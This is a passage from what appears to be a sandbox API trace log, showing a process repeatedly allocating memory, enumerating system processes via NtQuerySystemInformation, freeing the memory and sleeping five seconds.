(ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0213.291] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0213.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0213.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0213.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0213.525] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0213.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0213.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0213.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0213.776] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0213.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0213.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0214.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0214.009] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0214.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0214.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0214.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0214.227] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0214.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0214.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0214.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0214.461] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0214.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0214.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0214.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0214.693] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0214.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0214.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0214.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0214.998] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.241] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.413] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.535] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.670] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.826] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0215.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0215.933] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0215.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0215.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.053] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.182] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.299] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.407] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.514] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.606] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.693] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.833] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0216.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0216.927] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0216.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0216.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.059] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.177] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.288] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.408] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.529] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.638] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.741] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.871] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0217.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0217.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0217.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0217.982] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.131] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.247] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.351] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.463] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.578] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.696] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.823] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0218.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0218.929] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0218.934] NtAllocateVirtualMemory (in: 